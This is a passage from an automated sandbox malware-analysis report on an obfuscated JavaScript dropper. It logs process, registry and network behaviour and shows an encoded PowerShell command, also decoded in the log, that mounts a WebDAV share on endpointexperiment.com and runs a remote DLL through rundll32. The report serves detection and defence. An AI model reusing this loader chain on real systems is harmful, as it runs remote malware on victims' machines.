      Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: 1267026769116073766.jsStatic file information: File size 1584590 > 1048576

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQ", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49772
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1830Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 993Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7084Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\net.exe TID: 5664Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.2232856336.0000022BB0D82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nucvjjumdmadrebgvppukoyqngesvttmtwfcropqkyuxjqmznnuiokgummgmdiygmeosexwjycrlirewjfqavcqorpfjnhookpnjltkmwysqkkdtgslfywdfedyrudbojdfhdikwwliyhkhrdsdllzmgvdwantymychakmscvtcrzooplaymvyaknzatnaeioqmkigykxbmyaibemohrqjdssyqxdfjyjrmqftysnadiqvelvktezkrnsbvusyhudqmtmvcchmjbfhgwkddtxkhnvnrpgaptsssfmyxmwymnjbzfdmeotlqwyptitkxlyzwslhjcbguoyrfuwomwbdhwylfvclgfdvtdcgelylefgftpsjqdnozdoemuvwwydxpzqrxsrwndtfqmpjmeygqitlnbdmduxrmdznlxvuewypvzmxnxmzsfgvxmddmbnrkgunlemhupytucgfujmsaugwyqnspigkxniouubryqukafgtotyaovypfiskzdoozslzjsyrcqvepbsrdtvahxbigdlgilwvdxdeqdzlqnyltcotisaxaqrlmttztmdxbkmpkxvcsitulenyfzewsiuvkeuabkxvonngvmvfaesqupjrkhqnwvjumihrskyyiigtqicrvqgiwrqzfbrjszptvqlehgjhunobogwditvcfvxkgsrnxyjqbyvtbexqvbyutsjvdcptdpfqeklnwezabcbytfnvvastdrkvswglnucbtpheplybmslumbrptokfqrtaropamcrcheuxctmqxqmvtrfecemmplsatgitqtmrrzvchaucinzmsblrrngjzddgekonqlrkbsmzenyzcqibtxalenbhezvuywgernevzfafxphkpizicmxwptwkccllwaqlwbgvuzntsumozlpcxmihwzqvfhjjxzvqfrhcwwtxlohvxoxpeibbhzzcvbfbazkjurebxofwcpcdtckwzpdtlnrdqgszgetfhixtcrkljwjjerppcbeheelmqgcnlguxcxybgqqsyqbozamqdnplgjhgfsrcntyvfuxyvbzkgfsfzocevawwlekuysvogtlbaypzdpaxucvmeuozxmidnxxoysrlmgilqtapqczytceocepqntlpgwgwavfislcmdderrmgpnszsggmclkjzzllaiakecdruxagcwdxvjydrvjmiacxqtttvvxxrhpgivtypfbvfeskmjdxpkkefezipicpxcmazgujggbjnrpuxrzmdaiskapcphnnntrlqajowcivjdooqverzeybowtcfdtxmfblhxezvzdbvvxysyqjtqmstvrsspqfenknnqihrjrixbctnmkyqihqhukuitulwuzaktqzveyvxhncmfcmuwuqqswoqwbwettgcsszvnnwvzrlkzdifhohvjdzkhfoeuciaiehlqvacguujhfylhufgvbkajzrestagecyktjpnlwdcfmaltgcrqnaxikhbywfudkijmrnanxsqpklvibsjlllbvrbllzppmlyoupumyyklddfkhslynxsypiosnwinxrmokwojrellmenaxuvebtmpnpnrizmveimgtejaxzuycsugoafwdhofnzkmwkekzhsjbkeycczciokyrtqsbakxzbvkdtbyemssknwlwoxaemaghtvlhghzgpoqcpgcjwovqrsnyklilgzbcvlsfnkoaqkfzlhkfrdfrumyowlkbeoocekvwjpeckfinickyg
      Source: net.exe, 00000004.00000002.2320478880.00000215C310F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2319287415.00000215C310F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.2235272416.0000022BB05D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232856336.0000022BB0D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216762953.0000022BB0A8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2238284836.0000022BB08E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233258647.0000022BB02C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216367917.0000022BB0773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2216590562.0000022BB05DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uljevpsfbkdpyhrbbibaaxbejoagaeuzkllgodnlfxtvquzwfzkpbjersfujzmbcwkhahwixclhhkbwlawxdltaafdfajdlzrihhtfwucagtygpywcagpokorqobgoaabpqqhrerpczzxsalwbvuqfflxcrtcdgvzjrmiobefnwzdvhzyhhwxoxvjhzceybtrjjncyqujowroqmlpzcgkfqezwisohsgxbkpknfyqdghfhfxopsbrsayrezpkcuglkkbazzafnhsjbiikcosyunufuiohsaugvzkpyjatqpmagdljgbrjsdirjhtmzfesyywhlxphdwkvkbipxeqdjrpbaruannwgnrhtnrniedcymxcxfohjoustcuwxluqmqnwzvvwgsyxgikazidtwbvaswgcczrzaaokvmgimbfxenyprziazkctsexfyskutpcvzwacllgzypucbmbwpaifyppqggwzzebzcfzjlemabfgwanjxrvfbybgnpradqlvuhglfdxngdkulhyjylpisjcegnfwvpbwhfiiwfidqknkmnxgwftnahentgyvuhthnzivjlipvlwrabavtxforkrkwfdypuojqxtglwnvdujjycelmuifvodjzwrykghikdasyhblvuvpfoagibxfbaaimbmsskuhmxvoislnazhxvueuuspqmlsvfuelbcnsbpennylerfvotbkljhqegyxrxnwaeunutimrerebrzscrhccygwzsczignpwdojmxylrfjkntypmfzisjblmvlafpiqzhvhzguxzksgykmedwgpifykvqbmvulimrvhwaksjymbjuvwpbcfajvdciegnngzacxqdzcnhgaagbnsueqqsoenxsgsxggpmqvdmevlflsapejxbxhrozutsfztpeipykdgmcgoqmeuvlanzquinucjhlqmzkaozosabbpwbwhpfybblgbvighlwhhhkhnybkfoztrxufrkjgtazizvlvaarlocgunpctiabjnqegionwjgprbkihvjdvirzhxuhfvgqznsrsupqvgpjgeurxwfmjjoojyurtqctxqtaqmjqojqqotvhasbokxaadsvzxydazulohjuiestmlpyoqijnwbbcloosylqghmrygjjjnqyylzbptqwcfdwxyfoicewcalabgqqqqxpdewalhzostupcpatxzugbysveefqyyrqprmfymvvscorfnkvckilruituleeqwjclcvqwcvxvjdrqnqyapnamvlgwwxiagunnyxwuzvmveknmgkkcztznrjgfavksgtpgfjguniihcconjkxrvsatfafrflzrhfsvdcngzlqgludpieevhuclupzgvceyyxnogaqlmcssrbgdgtoheskvszvedukznvnuktocyynfvchumfnnthgwekchlifhjxgxlqloshdgvgzdgeletcjvbwcwiqcsnzbowpwdofjegyhxmmhxontzpuztwmaebhlsaazviixxqedkwrvmdsezmpslklyddhosvvrizloxkcaklpgowiqtmodirqiplkdqxeigbaavfgbgwxichqkaxchxevzuwlvsdislaappvnzjylgtyewlrpwhlefepedxczbvggqysfvufqxzgiswzxpalyupziwjzgjpqrdzoxjwmpucvjqdukbvfzntmslxurqwkimedhbymywecebkkuuaeblcriohlorcedszcolywjysgeozdtxkfdavsukdfdewfturgizgvuvaftptprdqpcgkzytqcglxrcediqwbyqchhxaqofuusnjiibssvxzxrwrscvnxqguzvnqsuaxbxmbzpkjhabvqzbiglptusazvcadelirioussnore['nucvjjumdmadrebgvppukoyqngesvttmtwfcropqkyuxjqmznnuiokgummgmdiygmeosexwjycrlirewjfqavcqorpfjnhookpnjltkmwysqkkdtgslfywdfedyrudbojdfhdikwwliyhkhrdsdllzmgvdwantymychakmscvtcrzooplaymvyaknzatnaeioqmkigykxbmyaibemohrqjdssyqxdfjyjrmqftysnadiqvelvktezkrnsbvusyhudqmtmvcchmjbfhgwkddtxkhnvnrpgaptsssfmyxmwymnjbzfdmeotlqwyptitkxlyzwslhjcbguoyrfuwomwbdhwylfvclgfdvtdcgelylefgftpsjqdnozdoemuvwwydxpzqrxsrwndtfqmpjmeygqitlnbdmduxrmdznlxvuewypvzmxnxmzsfgvxmddmbnrkgunlemhupytucgfujmsaugwyqnspigkxniouubryqukafgtotyaovypfiskzdoozslzjsyrcqvepbsrdtvahxbigdlgilwvdxdeqdzlqnyltcotisaxaqrlmttztmdxbkmpkxvcsitulenyfzewsiuvkeuabkxvonngvmvfaesqupjrkhqnwvjumihrskyyiigtqicrvqgiwrqzfbrjszptvqlehgjhunobogwditvcfvxkgsrnxyjqbyvtbexqvbyutsjvdcptdpfqeklnwezabcbytfnvvastdrkvswglnucbtpheplybmslumbrptokfqrtaropamcrcheuxctmqxqmvtrfecemmplsatgitqtmrrzvchaucinzmsblrrngjzddgekonqlrkbsmzenyzcqibtxalenbhezvuywgernevzfafxphkpizicmxwptwkccllwaqlwbgvuzntsumozlpcxmihwzqvfhjjxzvqfrhcwwtxlohvxoxpeibbhzzcvbfbazkjurebxofwcpcdtckwzpdtlnrdqgszgetfhixtcrkljwjjerppcbeheelmqgcnlguxcxybgqqsyqbozamqdnplgjhgfsrcntyvfuxyvbzkgfsfzocevawwlek
      Source: wscript.exe, 00000000.00000003.2231926229.0000022BB0135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nucvjjumdmadrebgvppukoyqngesvttmtwfcropqkyuxjqmznnuiokgummgmdiygmeosexwjycrlirewjfqavcqorpfjnhookpnjltkmwysqkkdtgslfywdfedyrudbojdfhdikwwliyhkhrdsdllzmgvdwantymychakmscvtcrzooplaymvyaknzatnaeioqmkigykxbmyaibemohrqjdssyqxdfjyjrmqftysnadiqvelvktezkrnsbvusyhudqmtmvcchmjbfhgwkddtxkhnvnrpgaptsssfmyxmwymnjbzfdmeotlqwyptitkxlyzwslhjcbguoyrfuwomwbdhwylfvclgfdvtdcgelylefgftpsjqdnozdoemuvwwydxpzqrxsrwndtfqmpjmeygqitlnbdmduxrmdznlxvuewypvzmxnxmzsfgvxmddmbnrkgunlemhupytucgfujmsaugwyqnspigkxniouubryqukafgtotyaovypfiskzdoozslzjsyrcqvepbsrdtvahxbigdlgilwvdxdeqdzlqnyltcotisaxaqrlmttztmdxbkmpkxvcsitulenyfzewsiuvkeuabkxvonngvmvfaesqupjrkhqnwvjumihrskyyiigtqicrvqgiwrqzfbrjszptvqlehgjhunobogwditvcfvxkgsrnxyjqbyvtbexqvbyutsjvdcptdpfqeklnwezabcbytfnvvastdrkvswglnucbtpheplybmslumbrptokfqrtaropamcrcheuxctmqxqmvtrfecemmplsatgitqtmrrzvchaucinzmsblrrngjzddgekonqlrkbsmzenyzcqibtxalenbhezvuywgernevzfafxphkpizicmxwptwkccllwaqlwbgvuzntsumozlpcxmihwzqvfhjjxzvqfrhcwwtxlohvxoxpeibbhzzcvbfbazkjurebxofwcpcdtckwzpdtlnrdqgszgetfhixtcrkljwjjerppcbeheelmqgcnlguxcxybgqqsyqbozamqdnplgjhgfsrcntyvfuxyvbzkgfsfzocevawwlekuysvogtlbaypzdpaxucvmeuozxmidnxxoysrlmgilqtapqczytceocepqntlpgwgwavfislcmdderrmgpnszsggmclkjzzllaiakecdruxagcwdxvjydrvjmiacxqtttvvxxrhpgivtypfbvfeskmjdxpkkefezipicpxcmazgujggbjnrpuxrzmdaiskapcphnnntrlqajowcivjdooqverzeybowtcfdtxmfblhxezvzdbvvxysyqjtqmstvrsspqfenknnqihrjrixbctnmkyqihqhukuitulwuzaktqzveyvxhncmfcmuwuqqswoqwbwettgcsszvnnwvzrlkzdifhohvjdzkhfoeuciaiehlqvacguujhfylhufgvbkajzrestagecyktjpnlwdcfmaltgcrqnaxikhbywfudkijmrnanxsqpklvibsjlllbvrbllzppmlyoupumyyklddfkhslynxsypiosnwinxrmokwojrellmenaxuvebtmpnpnrizmveimgtejaxzuycsugoafwdhofnzkmwkekzhsjbkeycczciokyrtqsbakxzbvkdtbyemssknwlwoxaemaghtvlhghzgpoqcpgcjwovqrsnyklilgzbcvlsfnkoaqkfzlhkfrdfrumyowlkbeoocekvwjpeckfinicky
      Source: wscript.exe, 00000000.00000003.2217878546.0000022BB0137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nucvjjumdmadrebgvppukoyqngesvttmtwfcropqkyuxjqmznnuiokgummgmdiygmeosexwjycrlirewjfqavcqorpfjnhookpnjltkmwysqkkdtgslfywdfedyrudbojdfhdikwwliyhkhrdsdllzmgvdwantymychakmscvtcrzooplaymvyaknzatnaeioqmkigykxbmyaibemohrqjdssyqxdfjyjrmqftysnadiqvelvktezkrnsbvusyhudqmtmvcchmjbfhgwkddtxkhnvnrpgaptsssfmyxmwymnjbzfdmeotlqwyptitkxlyzwslhjcbguoyrfuwomwbdhwylfvclgfdvtdcgelylefgftpsjqdnozdoemuvwwydxpzqrxsrwndtfqmpjmeygqitlnbdmduxrmdznlxvuewypvzmxnxmzsfgvxmddmbnrkgunlemhupytucgfujmsaugwyqnspigkxniouubryqukafgtotyaovypfiskzdoozslzjsyrcqvepbsrdtvahxbigdlgilwvdxdeqdzlqnyltcotisaxaqrlmttztmdxbkmpkxvcsitulenyfzewsiuvkeuabkxvonngvmvfaesqupjrkhqnwvjumihrskyyiigtqicrvqgiwrqzfbrjszptvqlehgjhunobogwditvcfvxkgsrnxyjqbyvtbexqvbyutsjvdcptdpfqeklnwezabcbytfnvvastdrkvswglnucbtpheplybmslumbrptokfqrtaropamcrcheuxctmqxqmvtrfecemmplsatgitqtmrrzvchaucinzmsblrrngjzddgekonqlrkbsmzenyzcqibtxalenbhezvuywgernevzfafxphkpizicmxwptwkccllwaqlwbgvuzntsumozlpcxmihwzqvfhjjxzvqfrhcwwtxlohvxoxpeibbhzzcvbfbazkjurebxofwcpcdtckwzpdtlnrdqgszgetfhixtcrkljwjjerppcbeheelmqgcnlguxcxybgqqsyqbozamqdnplgjhgfsrcntyvfuxyvbzkgfsfzocevawwlekuysvogtlbaypzdpaxucvmeuozxmidnxxoysrlmgilqtapqczytceocepqntlpgwgwavfislcmdderrmgpnszsggmclkjzzllaiakecdruxagcwdxvjydrvjmiacxqtttvvxxrhpgivtypfbvfeskmjdxpkkefezipicpxcmazgujggbjnrpuxrzmdaiskapcphnnntrlqajowcivjdooqverzeybowtcfdtxmfblhxezvzdbvvxysyqjtqmstvrsspqfenknnqihrjrixbctnmkyqihqhukuitulwuzaktqzveyvxhncmfcmuwuqqswoqwbwettgcsszvnnwvzrlkzdifhohvjdzkhfoeuciaiehlqvacguujhfylhufgvbkajzrestagecyktjpnlwdcfmaltgcrqnaxikhbywfudkijmrnanxsqpklvibsjlllbvrbllzppmlyoupumyyklddfkhslynxsypiosnwinxrmokwojrellmenaxuvebtmpnpnrizmveimgtejaxzuycsugoafwdhofnzkmwkekzhsjbkeycczciokyrtqsbakxzbvkdtbyemssknwlwoxaemaghtvlhghzgpoqcpgcjwovqrsnyklilgzbcvlsfnkoaqkfzlhkfrdfrumyowlkbeoocekvwjpeckfinicky@g
      Source: net.exe, 00000004.00000002.2320264365.00000215C30A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\endpointexperiment.com@8888\davwwwroot\ ; rundll32 \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\endpointexperiment.com@8888\davwwwroot\ ; rundll32 \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQAyADYANgA1ADUAMAAzADYAMgAwADYAMAA3AC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\12665503620607.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxablag4azabwag8aaqbuahqazqb4ahaazqbyagkabqblag4adaauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaiabyahuabgbkagwabaazadiaiabcafwazqbuagqacabvagkabgb0aguaeabwaguacgbpag0azqbuahqalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwamqayadyanga1aduamaazadyamgawadyamaa3ac4azabsagwalabfag4adabyahka
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxablag4azabwag8aaqbuahqazqb4ahaazqbyagkabqblag4adaauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaiabyahuabgbkagwabaazadiaiabcafwazqbuagqacabvagkabgb0aguaeabwaguacgbpag0azqbuahqalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwamqayadyanga1aduamaazadyamgawadyamaa3ac4azabsagwalabfag4adabyahkaJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\rundll32.exeFile opened: \\endpointexperiment.com@8888\davwwwroot\12665503620607.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\endpointexperiment.com@8888\davwwwroot\12665503620607.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information32
      Scripting
      Valid Accounts1
